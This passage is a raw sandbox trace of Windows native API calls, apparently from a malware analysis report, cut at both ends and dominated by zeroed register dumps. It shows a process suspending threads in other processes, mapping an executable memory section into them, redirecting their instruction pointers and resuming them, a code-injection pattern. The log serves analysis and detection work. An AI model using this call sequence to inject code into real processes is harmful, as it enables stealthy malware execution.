[414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0170.537] NtResumeThread (in: ThreadHandle=0x138, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0170.537] NtClose (Handle=0xb4) returned 0x0 [0170.537] NtClose (Handle=0x138) returned 0x0 [0170.538] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x101c, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x138) returned 0x0 [0170.538] NtQueryInformationProcess (in: ProcessHandle=0x138, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0170.538] NtQueryInformationProcess (in: ProcessHandle=0x138, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0170.538] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x3d1000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0170.539] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0170.613] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x1020) | out: ThreadHandle=0xdea64*=0xb4) returned 0x0 [0170.613] NtSuspendThread (in: ThreadHandle=0xb4, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0170.613] NtMapViewOfSection (in: SectionHandle=0xc4, ProcessHandle=0x138, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x2110000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0170.792] NtGetContextThread (in: ThreadHandle=0xb4, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x3d1000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7567895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0170.919] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x140) returned 0x0 [0170.919] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0x1a5200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x7300000, SectionOffset=0x0, ViewSize=0xde6ac*=0x1a6000) returned 0x0 [0170.933] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0x138, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0x1a5200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x2ae0000, SectionOffset=0x0, ViewSize=0xde6e8*=0x1a6000) returned 0x0 [0171.005] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x7300000) returned 0x0 [0171.032] NtClose (Handle=0x140) returned 0x0 [0171.032] NtSetContextThread (ThreadHandle=0xb4, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x3d1000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x2bf2707, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0171.035] NtResumeThread (in: ThreadHandle=0xb4, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0171.035] NtClose (Handle=0x138) returned 0x0 [0171.035] NtClose (Handle=0xb4) returned 0x0 [0171.038] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x1024, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0xb4) returned 0x0 [0171.038] NtQueryInformationProcess (in: ProcessHandle=0xb4, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0171.038] NtQueryInformationProcess (in: ProcessHandle=0xb4, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0171.039] NtReadVirtualMemory (in: ProcessHandle=0xb4, BaseAddress=0x369000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0171.039] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0171.043] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x1028) | out: ThreadHandle=0xdea64*=0x138) returned 0x0 [0171.043] NtSuspendThread (in: ThreadHandle=0x138, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0171.043] NtMapViewOfSection (in: SectionHandle=0xc4, ProcessHandle=0xb4, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x2050000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0171.053] NtGetContextThread (in: ThreadHandle=0x138, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x369000, Edx=0x0, Ecx=0x0, 